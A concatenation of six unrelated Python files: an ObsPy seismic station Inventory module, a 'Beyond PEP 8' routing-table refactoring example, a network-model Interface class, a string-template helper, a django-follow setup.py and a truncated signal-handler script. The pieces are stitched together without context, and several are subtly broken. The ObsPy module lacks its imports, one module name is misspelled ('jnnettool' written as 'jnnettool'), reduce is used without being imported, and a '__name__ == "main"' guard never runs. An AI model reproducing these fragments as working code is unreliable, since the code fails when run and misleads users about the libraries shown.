from obspy.core.util.base import (ENTRY_POINTS, ComparingObject,
_read_from_plugin, NamedTemporaryFile,
download_to_file, sanitize_filename)
from obspy.core.util.decorator import map_example_filename
from obspy.core.util.misc import buffered_load_entry_point
from obspy.core.util.obspy_types import ObsPyException, ZeroSamplingRate
from .network import Network
from .util import _unified_content_strings, _textwrap
# Make sure this is consistent with obspy.io.stationxml! Importing it
# from there results in hard to resolve cyclic imports.
SOFTWARE_MODULE = "ObsPy %s" % obspy.__version__
SOFTWARE_URI = "https://www.obspy.org"
def _create_example_inventory():
"""
Create an example inventory.
"""
data_dir = os.path.join(os.path.dirname(__file__), os.pardir, "data")
path = os.path.join(data_dir, "BW_GR_misc.xml")
return read_inventory(path, format="STATIONXML")
@map_example_filename("path_or_file_object")
def read_inventory(path_or_file_object=None, format=None, *args, **kwargs):
"""
Function to read inventory files.
:param path_or_file_object: File name or file like object. If this
attribute is omitted, an example :class:`Inventory`
object will be returned.
:type format: str
:param format: Format of the file to read (e.g. ``"STATIONXML"``). See the
`Supported Formats`_ section below for a list of supported formats.
:rtype: :class:`~obspy.core.inventory.inventory.Inventory`
:return: An ObsPy :class:`~obspy.core.inventory.inventory.Inventory`
object.
Additional args and kwargs are passed on to the underlying ``_read_X()``
methods of the inventory plugins.
.. rubric:: _`Supported Formats`
Additional ObsPy modules extend the functionality of the
:func:`~obspy.core.inventory.inventory.read_inventory` function. The
following table summarizes all known file formats currently supported by
ObsPy.
Please refer to the `Linked Function Call`_ of each module for any extra
options available at the import stage.
%s
.. note::
For handling additional information not covered by the
StationXML standard and how to output it to StationXML
see the :ref:`ObsPy Tutorial <stationxml-extra>`.
"""
if path_or_file_object is None:
# if no pathname or URL specified, return example catalog
return _create_example_inventory()
elif isinstance(path_or_file_object, (str, native_str)) and \
"://" in path_or_file_object:
# some URL
# extract extension if any
suffix = \
os.path.basename(path_or_file_object).partition('.')[2] or '.tmp'
with NamedTemporaryFile(suffix=sanitize_filename(suffix)) as fh:
download_to_file(url=path_or_file_object, filename_or_buffer=fh)
return read_inventory(fh.name, format=format)
return _read_from_plugin("inventory", path_or_file_object,
format=format, *args, **kwargs)[0]
@python_2_unicode_compatible
class Inventory(ComparingObject):
"""
The root object of the Inventory->Network->Station->Channel hierarchy.
In essence just a container for one or more networks.
"""
def __init__(self, networks=None, source=SOFTWARE_MODULE, sender=None,
created=None, module=SOFTWARE_MODULE,
module_uri=SOFTWARE_URI):
"""
:type networks: list of
:class:`~obspy.core.inventory.network.Network`
:param networks: A list of networks part of this inventory.
:type source: str
:param source: Network ID of the institution sending the message.
:type sender: str, optional
:param sender: Name of the institution sending this message.
:type created: :class:`~obspy.core.utcdatetime.UTCDateTime`, optional
:param created: The time when the document was created. Will be set to
the current time if not given.
:type module: str
:param module: Name of the software module that generated this
document, defaults to ObsPy related information.
:type module_uri: str
:param module_uri: This is the address of the query that generated the
document, or, if applicable, the address of the software that
generated this document, defaults to ObsPy related information.
.. note::
For handling additional information not covered by the
StationXML standard and how to output it to StationXML
see the :ref:`ObsPy Tutorial <stationxml-extra>`.
"""
self.networks = networks if networks is not None else []
self.source = source
self.sender = sender
self.module = module
self.module_uri = module_uri
# Set the created field to the current time if not given otherwise.
if created is None:
self.created = obspy.UTCDateTime()
else:
self.created = created
def __add__(self, other):
new = copy.deepcopy(self)
new += other
return new
def __iadd__(self, other):
if isinstance(other, Inventory):
self.networks.extend(other.networks)
# This is a straight inventory merge.
self.__copy_inventory_metadata(other)
elif isinstance(other, Network):
self.networks.append(other)
else:
msg = ("Only Inventory and Network objects can be added to "
"an Inventory.")
raise TypeError(msg)
return self
def __len__(self):
return len(self.networks)
def __getitem__(self, index):
return self.networks[index]
def __copy_inventory_metadata(self, other):
"""
Will be called after two inventory objects have been merged. It
attempts to assure that inventory meta information is somewhat
correct after the merging.
The networks in other will have been moved to self.
"""
# The creation time is naturally adjusted to the current time.
self.created = obspy.UTCDateTime()
# Merge the source.
srcs = [self.source, other.source]
srcs = [_i for _i in srcs if _i]
all_srcs = []
for src in srcs:
all_srcs.extend(src.split(","))
if all_srcs:
src = sorted(list(set(all_srcs)))
self.source = ",".join(src)
else:
self.source = None
# Do the same with the sender.
sndrs = [self.sender, other.sender]
sndrs = [_i for _i in sndrs if _i]
all_sndrs = []
for sndr in sndrs:
all_sndrs.extend(sndr.split(","))
if all_sndrs:
sndr = sorted(list(set(all_sndrs)))
self.sender = ",".join(sndr)
else:
self.sender = None
# The module and URI strings will be changed to ObsPy as it did the
# modification.
self.module = SOFTWARE_MODULE
self.module_uri = SOFTWARE_URI
def get_contents(self):
"""
Returns a dictionary containing the contents of the object.
.. rubric:: Example
>>> example_filename = "/path/to/IRIS_single_channel_with_response.xml"
>>> inventory = read_inventory(example_filename)
>>> inventory.get_contents() \
# doctest: +NORMALIZE_WHITESPACE +ELLIPSIS
{...}
>>> for k, v in sorted(inventory.get_contents().items()): \
# doctest: +NORMALIZE_WHITESPACE
... print(k, v[0])
channels IU.ANMO.10.BHZ
networks IU
stations IU.ANMO (Albuquerque, New Mexico, USA)
"""
content_dict = {
"networks": [],
"stations": [],
"channels": []}
for network in self.networks:
content_dict['networks'].append(network.code)
for key, value in network.get_contents().items():
content_dict.setdefault(key, [])
content_dict[key].extend(value)
content_dict[key].sort()
content_dict['networks'].sort()
return content_dict
def __str__(self):
ret_str = "Inventory created at %s\n" % str(self.created)
if self.module:
module_uri = self.module_uri
if module_uri and len(module_uri) > 70:
module_uri = textwrap.wrap(module_uri, width=67)[0] + "..."
ret_str += ("\tCreated by: %s%s\n" % (
self.module,
"\n\t\t %s" % (module_uri if module_uri else "")))
ret_str += "\tSending institution: %s%s\n" % (
self.source, " (%s)" % self.sender if self.sender else "")
contents = self.get_contents()
ret_str += "\tContains:\n"
ret_str += "\t\tNetworks (%i):\n" % len(contents["networks"])
ret_str += "\n".join(_textwrap(
", ".join(_unified_content_strings(contents["networks"])),
initial_indent="\t\t\t", subsequent_indent="\t\t\t",
expand_tabs=False))
ret_str += "\n"
ret_str += "\t\tStations (%i):\n" % len(contents["stations"])
ret_str += "\n".join([
"\t\t\t%s" % _i
for _i in _unified_content_strings(contents["stations"])])
ret_str += "\n"
ret_str += "\t\tChannels (%i):\n" % len(contents["channels"])
ret_str += "\n".join(_textwrap(
", ".join(_unified_content_strings(contents["channels"])),
initial_indent="\t\t\t", subsequent_indent="\t\t\t",
expand_tabs=False))
return ret_str
def _repr_pretty_(self, p, cycle):
p.text(str(self))
def write(self, path_or_file_object, format, **kwargs):
"""
Writes the inventory object to a file or file-like object in
the specified format.
:param path_or_file_object: File name or file-like object to be written
to.
:type format: str
:param format: The file format to use (e.g. ``"STATIONXML"``). See the
`Supported Formats`_ section below for a list of supported formats.
:param kwargs: Additional keyword arguments passed to the underlying
plugin's writer method.
.. rubric:: Example
>>> from obspy import read_inventory
>>> inventory = read_inventory()
>>> inventory.write("example.xml",
... format="STATIONXML") # doctest: +SKIP
.. rubric:: _`Supported Formats`
Additional ObsPy modules extend the parameters of the
:meth:`~obspy.core.inventory.inventory.Inventory.write()` method. The
following table summarizes all known formats with write capability
currently available for ObsPy.
Please refer to the `Linked Function Call`_ of each module for any
extra options available.
%s
"""
format = format.upper()
try:
# get format specific entry point
format_ep = ENTRY_POINTS['inventory_write'][format]
# search writeFormat method for given entry point
write_format = buffered_load_entry_point(
format_ep.dist.key,
'obspy.plugin.inventory.%s' % (format_ep.name), 'writeFormat')
except (IndexError, ImportError, KeyError):
msg = "Writing format '{}' is not supported. Supported types: {}"
msg = msg.format(format,
', '.join(ENTRY_POINTS['inventory_write']))
raise ValueError(msg)
return write_format(self, path_or_file_object, **kwargs)
@property
def networks(self):
return self._networks
@networks.setter
def networks(self, value):
if not hasattr(value, "__iter__"):
msg = "networks needs to be iterable, e.g. a list."
raise ValueError(msg)
if any([not isinstance(x, Network) for x in value]):
msg = "networks can only contain Network objects."
raise ValueError(msg)
self._networks = value
def get_response(self, seed_id, datetime):
"""
Find response for a given channel at given time.
>>> from obspy import read_inventory, UTCDateTime
>>> inventory = read_inventory("/path/to/IU_ANMO_BH.xml")
>>> datetime = UTCDateTime("2012-08-24T00:00:00")
>>> response = inventory.get_response("IU.ANMO.00.BHZ", datetime)
>>> print(response) # doctest: +ELLIPSIS +NORMALIZE_WHITESPACE
Channel Response
From M/S (Velocity in Meters Per Second) to COUNTS (Digital Counts)
Overall Sensitivity: 3.27508e+09 defined at 0.020 Hz
3 stages:
Stage 1: PolesZerosResponseStage from M/S to V, gain: 1952.1
Stage 2: CoefficientsTypeResponseStage from V to COUNTS, gain: ...
Stage 3: CoefficientsTypeResponseStage from COUNTS to COUNTS, ...
:type seed_id: str
:param seed_id: SEED ID string of channel to get response for.
:type datetime: :class:`~obspy.core.utcdatetime.UTCDateTime`
:param datetime: Time to get response for.
:rtype: :class:`~obspy.core.inventory.response.Response`
:returns: Response for time series specified by input arguments.
"""
network, _, _, _ = seed_id.split(".")
responses = []
for net in self.networks:
if net.code != network:
continue
try:
responses.append(net.get_response(seed_id, datetime))
except Exception:
pass
if len(responses) > 1:
msg = "Found more than one matching response. Returning first."
warnings.warn(msg)
elif len(responses) < 1:
msg = "No matching response information found."
raise Exception(msg)
return responses[0]
def get_channel_metadata(self, seed_id, datetime=None):
"""
Return basic metadata for a given channel.
:type seed_id: str
:param seed_id: SEED ID string of channel to get metadata for.
:type datetime: :class:`~obspy.core.utcdatetime.UTCDateTime`, optional
:param datetime: Time to get metadata for.
:rtype: dict
:return: Dictionary containing coordinates and orientation (latitude,
longitude, elevation, azimuth, dip)
"""
network, _, _, _ = seed_id.split(".")
metadata = []
for net in self.networks:
if net.code != network:
continue
try:
metadata.append(net.get_channel_metadata(seed_id, datetime))
except Exception:
pass
if len(metadata) > 1:
msg = ("Found more than one matching channel metadata. "
"Returning first.")
warnings.warn(msg)
elif len(metadata) < 1:
msg = "No matching channel metadata found."
raise Exception(msg)
return metadata[0]
def get_coordinates(self, seed_id, datetime=None):
"""
Return coordinates for a given channel.
>>> from obspy import read_inventory, UTCDateTime
>>> inv = read_inventory()
>>> t = UTCDateTime("2015-01-01")
>>> inv.get_coordinates("GR.FUR..LHE", t) # doctest: +SKIP
{'elevation': 565.0,
'latitude': 48.162899,
'local_depth': 0.0,
'longitude': 11.2752}
:type seed_id: str
:param seed_id: SEED ID string of channel to get coordinates for.
:type datetime: :class:`~obspy.core.utcdatetime.UTCDateTime`, optional
:param datetime: Time to get coordinates for.
:rtype: dict
:return: Dictionary containing coordinates (latitude, longitude,
elevation, local_depth)
"""
metadata = self.get_channel_metadata(seed_id, datetime)
coordinates = {}
for key in ['latitude', 'longitude', 'elevation', 'local_depth']:
coordinates[key] = metadata[key]
return coordinates
def get_orientation(self, seed_id, datetime=None):
"""
Return orientation for a given channel.
>>> from obspy import read_inventory, UTCDateTime
>>> inv = read_inventory()
>>> t = UTCDateTime("2015-01-01")
>>> inv.get_orientation("GR.FUR..LHE", t) # doctest: +SKIP
{'azimuth': 90.0,
'dip': 0.0}
:type seed_id: str
:param seed_id: SEED ID string of channel to get orientation for.
:type datetime: :class:`~obspy.core.utcdatetime.UTCDateTime`, optional
:param datetime: Time to get orientation for.
:rtype: dict
:return: Dictionary containing orientation (azimuth, dip).
"""
metadata = self.get_channel_metadata(seed_id, datetime)
orientation = {}
for key in ['azimuth', 'dip']:
orientation[key] = metadata[key]
return orientation
def select(self, network=None, station=None, location=None, channel=None,
time=None, starttime=None, endtime=None, sampling_rate=None,
keep_empty=False):
r"""
Returns the :class:`Inventory` object with only the
:class:`~obspy.core.inventory.network.Network`\ s /
:class:`~obspy.core.inventory.station.Station`\ s /
:class:`~obspy.core.inventory.channel.Channel`\ s that match the given
criteria (e.g. all channels with ``channel="EHZ"``).
.. warning::
The returned object is based on a shallow copy of the original
object. That means that modifying any mutable child elements will
also modify the original object
(see https://docs.python.org/2/library/copy.html).
Use :meth:`copy()` afterwards to make a new copy of the data in
memory.
.. rubric:: Example
>>> from obspy import read_inventory, UTCDateTime
>>> inv = read_inventory()
>>> t = UTCDateTime(2007, 7, 1, 12)
>>> inv = inv.select(channel="*Z", station="[RW]*", time=t)
>>> print(inv) # doctest: +NORMALIZE_WHITESPACE
Inventory created at 2014-03-03T11:07:06.198000Z
Created by: fdsn-stationxml-converter/1.0.0
http://www.iris.edu/fdsnstationconverter
Sending institution: Erdbebendienst Bayern
Contains:
Networks (2):
BW, GR
Stations (2):
BW.RJOB (Jochberg, Bavaria, BW-Net)
GR.WET (Wettzell, Bavaria, GR-Net)
Channels (4):
BW.RJOB..EHZ, GR.WET..BHZ, GR.WET..HHZ, GR.WET..LHZ
The `network`, `station`, `location` and `channel` selection criteria
may also contain UNIX style wildcards (e.g. ``*``, ``?``, ...; see
:func:`~fnmatch.fnmatch`).
:type network: str
:param network: Potentially wildcarded network code. If not given,
all network codes will be accepted.
:type station: str
:param station: Potentially wildcarded station code. If not given,
all station codes will be accepted.
:type location: str
:param location: Potentially wildcarded location code. If not given,
all location codes will be accepted.
:type channel: str
:param channel: Potentially wildcarded channel code. If not given,
all channel codes will be accepted.
:type time: :class:`~obspy.core.utcdatetime.UTCDateTime`
:param time: Only include networks/stations/channels active at given
point in time.
:type starttime: :class:`~obspy.core.utcdatetime.UTCDateTime`
:param starttime: Only include networks/stations/channels active at or
after given point in time (i.e. channels ending before given time
will not be shown).
:type endtime: :class:`~obspy.core.utcdatetime.UTCDateTime`
:param endtime: Only include networks/stations/channels active before
or at given point in time (i.e. channels starting after given time
will not be shown).
:type sampling_rate: float
:type keep_empty: bool
:param keep_empty: If set to `True`, networks/stations that match
themselves but have no matching child elements (stations/channels)
will be included in the result.
"""
networks = []
for net in self.networks:
# skip if any given criterion is not matched
if network is not None:
if not fnmatch.fnmatch(net.code.upper(),
network.upper()):
continue
if any([t is not None for t in (time, starttime, endtime)]):
if not net.is_active(time=time, starttime=starttime,
endtime=endtime):
continue
has_stations = bool(net.stations)
net_ = net.select(
station=station, location=location, channel=channel, time=time,
starttime=starttime, endtime=endtime,
sampling_rate=sampling_rate, keep_empty=keep_empty)
# If the network previously had stations but no longer has any
# and keep_empty is False: Skip the network.
if has_stations and not keep_empty and not net_.stations:
continue
networks.append(net_)
inv = copy.copy(self)
inv.networks = networks
return inv
def plot(self, projection='global', resolution='l',
continent_fill_color='0.9', water_fill_color='1.0', marker="v",
size=15**2, label=True, color='#b15928', color_per_network=False,
colormap="Paired", legend="upper left", time=None, show=True,
outfile=None, method=None, fig=None, **kwargs): # @UnusedVariable
"""
Creates a preview map of all networks/stations in current inventory
object.
:type projection: str, optional
:param projection: The map projection. Currently supported are:
* ``"global"`` (Will plot the whole world.)
* ``"ortho"`` (Will center around the mean lat/long.)
* ``"local"`` (Will plot around local events)
Defaults to ``"global"``
:type resolution: str, optional
:param resolution: Resolution of the boundary database to use. Will be
based directly to the basemap module. Possible values are:
* ``"c"`` (crude)
* ``"l"`` (low)
* ``"i"`` (intermediate)
* ``"h"`` (high)
* ``"f"`` (full)
Defaults to ``"l"``
:type continent_fill_color: Valid matplotlib color, optional
:param continent_fill_color: Color of the continents. Defaults to
``"0.9"`` which is a light gray.
:type water_fill_color: Valid matplotlib color, optional
:param water_fill_color: Color of all water bodies.
Defaults to ``"white"``.
:type marker: str
:param marker: Marker symbol (see :func:`matplotlib.pyplot.scatter`).
:type size: float
:param size: Marker size (see :func:`matplotlib.pyplot.scatter`).
:type label: bool
:param label: Whether to label stations with "network.station" or not.
:type color: str
:param color: Face color of marker symbol (see
:func:`matplotlib.pyplot.scatter`). Defaults to the first color
from the single-element "Paired" color map.
:type color_per_network: bool or dict
:param color_per_network: If set to ``True``, each network will be
drawn in a different color. A dictionary can be provided that maps
network codes to color values (e.g.
``color_per_network={"GR": "black", "II": "green"}``).
:type colormap: str, any matplotlib colormap, optional
:param colormap: Only used if ``color_per_network=True``. Specifies
which colormap is used to draw the colors for the individual
networks. Defaults to the "Paired" color map.
:type legend: str or None
:param legend: Location string for legend, if networks are plotted in
different colors (i.e. option ``color_per_network`` in use). See
:func:`matplotlib.pyplot.legend` for possible values for
legend location string. To disable legend set to ``None``.
:type time: :class:`~obspy.core.utcdatetime.UTCDateTime`
:param time: Only plot stations available at given point in time.
:type show: bool
:param show: Whether to show the figure after plotting or not. Can be
used to do further customization of the plot before showing it.
:type outfile: str
:param outfile: Output file path to directly save the resulting image
(e.g. ``"/tmp/image.png"``). Overrides the ``show`` option, image
will not be displayed interactively. The given path/file name is
also used to automatically determine the output format. Supported
file formats depend on your matplotlib backend. Most backends
support png, pdf, ps, eps and svg. Defaults to ``None``.
:type method: str
:param method: Method to use for plotting. Possible values are:
* ``'basemap'`` to use the Basemap library
* ``'cartopy'`` to use the Cartopy library
* ``None`` to use the best available library
Defaults to ``None``.
:type fig: :class:`matplotlib.figure.Figure`
:param fig: Figure instance to reuse, returned from a previous
inventory/catalog plot call with `method=basemap`.
If a previous basemap plot is reused, any kwargs regarding the
basemap plot setup will be ignored (i.e. `projection`,
`resolution`, `continent_fill_color`, `water_fill_color`). Note
that multiple plots using colorbars likely are problematic, but
e.g. one station plot (without colorbar) and one event plot (with
colorbar) together should work well.
:returns: Figure instance with the plot.
.. rubric:: Example
Mollweide projection for global overview:
>>> from obspy import read_inventory
>>> inv = read_inventory()
>>> inv.plot(label=False) # doctest:+SKIP
.. plot::
from obspy import read_inventory
inv = read_inventory()
inv.plot(label=False)
Orthographic projection, automatic colors per network:
>>> inv.plot(projection="ortho", label=False,
... color_per_network=True) # doctest:+SKIP
.. plot::
from obspy import read_inventory
inv = read_inventory()
inv.plot(projection="ortho", label=False, color_per_network=True)
Local (Albers equal area) projection, with custom colors:
>>> colors = {'GR': 'blue', 'BW': 'green'}
>>> inv.plot(projection="local",
... color_per_network=colors) # doctest:+SKIP
.. plot::
from obspy import read_inventory
inv = read_inventory()
inv.plot(projection="local",
color_per_network={'GR': 'blue',
'BW': 'green'})
Combining a station and event plot (uses basemap):
>>> from obspy import read_inventory, read_events
>>> inv = read_inventory()
>>> cat = read_events()
>>> fig = inv.plot(method="basemap", show=False) # doctest:+SKIP
>>> cat.plot(method="basemap", fig=fig) # doctest:+SKIP
.. plot::
from obspy import read_inventory, read_events
inv = read_inventory()
cat = read_events()
fig = inv.plot(show=False)
cat.plot(fig=fig)
"""
from obspy.imaging.maps import plot_map
import matplotlib.pyplot as plt
# The empty ones must be kept as otherwise inventory files without
# channels will end up with nothing.
inv = self.select(time=time, keep_empty=True)
# lat/lon coordinates, magnitudes, dates
lats = []
lons = []
labels = []
colors = []
if color_per_network and not isinstance(color_per_network, dict):
from matplotlib.cm import get_cmap
codes = set([n.code for n in inv])
cmap = get_cmap(name=colormap, lut=len(codes))
color_per_network = dict([(code, cmap(i))
for i, code in enumerate(sorted(codes))])
for net in inv:
for sta in net:
if sta.latitude is None or sta.longitude is None:
msg = ("Station '%s' does not have latitude/longitude "
"information and will not be plotted." % label)
warnings.warn(msg)
continue
if color_per_network:
label_ = " %s" % sta.code
color_ = color_per_network.get(net.code, "k")
else:
label_ = " " + ".".join((net.code, sta.code))
color_ = color
lats.append(sta.latitude)
lons.append(sta.longitude)
labels.append(label_)
colors.append(color_)
if not label:
labels = None
fig = plot_map(method, lons, lats, size, colors, labels,
projection=projection, resolution=resolution,
continent_fill_color=continent_fill_color,
water_fill_color=water_fill_color,
colormap=None, colorbar=False, marker=marker,
title=None, show=False, fig=fig, **kwargs)
if legend is not None and color_per_network:
ax = fig.axes[0]
count = len(ax.collections)
for code, color in sorted(color_per_network.items()):
ax.scatter([0], [0], size, color, label=code, marker=marker)
# workaround for older matplotlib versions
try:
ax.legend(loc=legend, fancybox=True, scatterpoints=1,
fontsize="medium", markerscale=0.8,
handletextpad=0.1)
except TypeError:
leg_ = ax.legend(loc=legend, fancybox=True, scatterpoints=1,
markerscale=0.8, handletextpad=0.1)
leg_.prop.set_size("medium")
# remove collections again solely created for legend handles
ax.collections = ax.collections[:count]
if outfile:
fig.savefig(outfile)
else:
if show:
plt.show()
return fig
def plot_response(self, min_freq, output="VEL", network="*", station="*",
location="*", channel="*", time=None, starttime=None,
endtime=None, axes=None, unwrap_phase=False,
plot_degrees=False, show=True, outfile=None):
"""
Show bode plot of instrument response of all (or a subset of) the
inventory's channels.
:type min_freq: float
:param min_freq: Lowest frequency to plot.
:type output: str
:param output: Output units. One of:
* ``"DISP"`` -- displacement, output unit is meters;
* ``"VEL"`` -- velocity, output unit is meters/second; or,
* ``"ACC"`` -- acceleration, output unit is meters/second**2.
:type network: str
:param network: Only plot matching networks. Accepts UNIX style
patterns and wildcards (e.g. ``"G*"``, ``"*[ER]"``; see
:func:`~fnmatch.fnmatch`)
:type station: str
:param station: Only plot matching stations. Accepts UNIX style
patterns and wildcards (e.g. ``"L44*"``, ``"L4?A"``,
``"[LM]44A"``; see :func:`~fnmatch.fnmatch`)
:type location: str
:param location: Only plot matching channels. Accepts UNIX style
patterns and wildcards (e.g. ``"BH*"``, ``"BH?"``, ``"*Z"``,
``"[LB]HZ"``; see :func:`~fnmatch.fnmatch`)
:type channel: str
:param channel: Only plot matching channels. Accepts UNIX style
patterns and wildcards (e.g. ``"BH*"``, ``"BH?"``, ``"*Z"``,
``"[LB]HZ"``; see :func:`~fnmatch.fnmatch`)
:type time: :class:`~obspy.core.utcdatetime.UTCDateTime`
:param time: Only regard networks/stations/channels active at given
point in time.
:type starttime: :class:`~obspy.core.utcdatetime.UTCDateTime`
:param starttime: Only regard networks/stations/channels active at or
after given point in time (i.e. networks ending before given time
will not be shown).
:type endtime: :class:`~obspy.core.utcdatetime.UTCDateTime`
:param endtime: Only regard networks/stations/channels active before or
at given point in time (i.e. networks starting after given time
will not be shown).
:type axes: list of 2 :class:`matplotlib.axes.Axes`
:param axes: List/tuple of two axes instances to plot the
amplitude/phase spectrum into. If not specified, a new figure is
opened.
:type unwrap_phase: bool
:param unwrap_phase: Set optional phase unwrapping using NumPy.
:type plot_degrees: bool
:param plot_degrees: if ``True`` plot bode in degrees
:type show: bool
:param show: Whether to show the figure after plotting or not. Can be
used to do further customization of the plot before showing it.
:type outfile: str
:param outfile: Output file path to directly save the resulting image
(e.g. ``"/tmp/image.png"``). Overrides the ``show`` option, image
will not be displayed interactively. The given path/file name is
also used to automatically determine the output format. Supported
file formats depend on your matplotlib backend. Most backends
support png, pdf, ps, eps and svg. Defaults to ``None``.
.. rubric:: Basic Usage
>>> from obspy import read_inventory
>>> inv = read_inventory()
>>> inv.plot_response(0.001, station="RJOB") # doctest: +SKIP
.. plot::
from obspy import read_inventory
inv = read_inventory()
inv.plot_response(0.001, station="RJOB")
"""
import matplotlib.pyplot as plt
if axes is not None:
ax1, ax2 = axes
fig = ax1.figure
else:
fig = plt.figure()
ax1 = fig.add_subplot(211)
ax2 = fig.add_subplot(212, sharex=ax1)
matching = self.select(network=network, station=station,
location=location, channel=channel, time=time,
starttime=starttime, endtime=endtime)
for net in matching.networks:
for sta in net.stations:
for cha in sta.channels:
try:
cha.plot(min_freq=min_freq, output=output,
axes=(ax1, ax2),
label=".".join((net.code, sta.code,
cha.location_code, cha.code)),
unwrap_phase=unwrap_phase,
plot_degrees=plot_degrees, show=False,
outfile=None)
except ZeroSamplingRate:
msg = ("Skipping plot of channel with zero "
"sampling rate:\n%s")
warnings.warn(msg % str(cha), UserWarning)
except ObsPyException as e:
msg = "Skipping plot of channel (%s):\n%s"
warnings.warn(msg % (str(e), str(cha)), UserWarning)
# final adjustments to plot if we created the figure in here
if axes is None:
from obspy.core.inventory.response import _adjust_bode_plot_figure
_adjust_bode_plot_figure(fig, plot_degrees, show=False)
if outfile:
fig.savefig(outfile)
else:
if show:
plt.show()
return fig
if __name__ == '__main__':
import doctest
doctest.testmod(exclude_empty=True)
|
# Credits to Raymond Hettinger - Beyond PEP 8
import jnettool.tools.elements.NetworkElement
import jnettool.tools.Routing
import jnettool.tools.RouteInspector
ne = jnnettool.tools.elements.NetworkElement('171.0.2.45')
"""
in some way there is nothing wrong with this code
It works and it's readable.
On the other hand, the code on the bottom is profoundly better
Code on the top would pass most people's coding standards, it would get checked in
and would live for a long time and other people would copy that style, and we would congratulate
we're being "compliant"
What is wrong is "ignoring the Gorilla"
Recommendations:
* avoid unnecessary packaging in favor of simple imports -> probably solved by using the * import (e.g. import java.lang.*)
* Custom Exceptions -> allows putting a name to the problem
* properties instead of getters -> this is not available in java, but we have @Getter and/or @Accessors(fluent=true)
or simply define a routingTable() method
"""
try:
routing_table = ne.getRoutingTable()
except jnettool.tools.elements.MissingVar:
logging.exception('No routing table found')
ne.cleanup('rollback')
else:
num_routes = routing_table.getSize()
for RToffset in range(num_routes):
route = routing_table.getRouteByIndex(RToffset)
name = route.getName()
ipaddr = route.getIPAddr()
print("%15s -> %s" % (name, ipaddr))
finally:
ne.cleanup('commit')
ne.disconnect()
#################################
from nettools import NetworkElement
with NetworkElement('171.0.2.45') as ne:
for route in ne.routing_table:
print("%15s -> %s" % (route.name, route.ipaddr))
|
"""An object representing a Node interface"""
from .rsvp import RSVP_LSP
from .exceptions import ModelException
class Interface(object):
"""An object representing a Node interface"""
def __init__(self, name, cost, capacity, node_object, remote_node_object,
address=0):
self.name = name
self.cost = cost
self.capacity = capacity
self.node_object = node_object
self.remote_node_object = remote_node_object
self.address = address
self.traffic = 0.0
self._failed = False
self.reserved_bandwidth = 0
# self._reservable_bandwidth = self.capacity - self.reserved_bandwidth
# Validate cost and capacity values
if not(isinstance(cost, (int, float))) or cost < 0:
raise ValueError('Cost must be positive integer or float')
if not(isinstance(capacity, (int, float))) or capacity < 0:
raise ValueError('Capacity must be positive integer or float')
@property
def _key(self):
"""Unique ID for interface object"""
return (self.name, self.node_object.name)
# Modify the __hash__ and __eq__ methods to make comparisons easier
def __eq__(self, other_object):
if not isinstance(other_object, Interface):
return NotImplemented
return [self.node_object, self.remote_node_object, self.name,
self.capacity, self.address] == [other_object.node_object,
other_object.remote_node_object, other_object.name,
other_object.capacity, other_object.address]
# return self.__dict__ == other_object.__dict__
def __hash__(self):
return hash(tuple(sorted(self.__dict__.items())))
def __repr__(self):
return '%s(name = %r, cost = %s, capacity = %s, node_object = %r, \
remote_node_object = %r, address = %r)' % (self.__class__.__name__,
self.name,
self.cost,
self.capacity,
self.node_object,
self.remote_node_object,
self.address)
# TODO - is this call necessary?! ####
# @staticmethod
# def get_interface(interface_name, node_name, model):
# """
# Returns an interface object for specified node name and interface name
# """
# for interface in (interface for interface in model.interface_objects):
# if interface.node_object.name == node_name and interface.name == interface_name:
# needed_interface = interface
# break
# return needed_interface
@property
def reservable_bandwidth(self):
"""Amount of bandwidth available for rsvp lsp reservation"""
return self.capacity - self.reserved_bandwidth
@property
def failed(self):
return self._failed
@failed.setter
def failed(self, status):
if not(isinstance(status, bool)):
raise ModelException('must be boolean value')
if status is False:
# Check to see if both nodes are failed = False
if self.node_object.failed is False and self.remote_node_object.failed is False:
self._failed = False
else:
self._failed = True
else:
self._failed = True
def fail_interface(self, model):
"""
Returns an updated model with the specified
interface and the remote interface with failed==True
"""
# find the remote interface
remote_interface = Interface.get_remote_interface(self, model)
# set the 2 interfaces to failed = True
self.failed = True
remote_interface.failed = True
def unfail_interface(self, model):
"""
Returns an updated network_interfaces table with the specified
interface and the remote interface in the 'failed': False state
"""
# find the remote interface
remote_interface = Interface.get_remote_interface(self, model)
# check to see if the local and remote node are failed
if self.node_object.failed is False and self.remote_node_object.failed is False:
# set the 2 interfaces to failed = False
self.failed = False
remote_interface.failed = False
else:
message = "Local and/or remote node are failed; cannot have unfailed interface on failed node"
raise ModelException(message)
def get_remote_interface(self, model):
"""Searches the model and returns the remote interface"""
for interface in (interface for interface in model.interface_objects):
if interface.node_object.name == self.remote_node_object.name and \
interface.address == self.address:
remote_interface = interface
break
# sanity check
if remote_interface.remote_node_object.interfaces(model) == \
self.node_object.interfaces(model):
return remote_interface
else:
message = 'Internal Validation Error', remote_interface, \
'and', self, 'fail validation checks'
raise ModelException(message)
# TODO - figure out if these get circuit calls are even appropriate
# to be in the Interface Class; would they be better served just
# being in the Model?
def get_circuit_object(self, model):
"""
Returns the circuit object from the model that an
interface is associated with."""
ckt = model.get_circuit_object_from_interface(self.name,
self.node_object.name)
return ckt
def demands(self, model):
"""Returns list of demands that egress the interface"""
dmd_list = []
demands = model.demand_objects
for demand in demands:
for demand_path in demand.path:
# If demand_path is an RSVP LSP, look at the LSP path
if isinstance(demand_path, RSVP_LSP):
for dmd in demand_path.demands_on_lsp(model):
dmd_list.append(dmd)
# If demand_path is not an LSP, look for self in demand_path
elif self in demand_path:
dmd_list.append(demand)
return dmd_list
@property
def utilization(self):
"""Returns utilization = (self.traffic/self.capacity)*100% """
if self.traffic == 'Down':
return 'Int is down'
else:
return self.traffic / self.capacity
|
from re import compile, finditer
REGEX = compile(r'\{\{([a-zA-Z]+)\}\}')
REPLS = ('{{', '{'), ('}}', '}')
def create_template(s):
def my_template(**kwargs):
keys = {a.group(1): '' for a in finditer(REGEX, s)}
keys.update(kwargs)
return reduce(lambda a, kv: a.replace(*kv), REPLS, s).format(**keys)
return my_template
|
#!/usr/bin/env python
from setuptools import setup, find_packages
import follow
setup(
name='django-follow',
description='Application which enables following features for users. Can be used for contact books or whatnot',
long_description=open('README.rst').read(),
packages=find_packages(),
author='Alen Mujezinovic',
author_email='alen@caffeinehit.com',
url='https://github.com/caffeinehit/django-follow',
include_package_data=True,
package_data={'follow': ['templates/follow/*html']},
zip_safe=False,
version=follow.__version__,
)
|
#!/usr/bin/env python3
import signal
import subprocess
import sys
def signal_handler(sig, frame):
print('PREEMPTED')
sys.exit(2)
if __name__ == "main":
# Setup signal handler
signal.signal(signal.SIGINT, signal_handler)
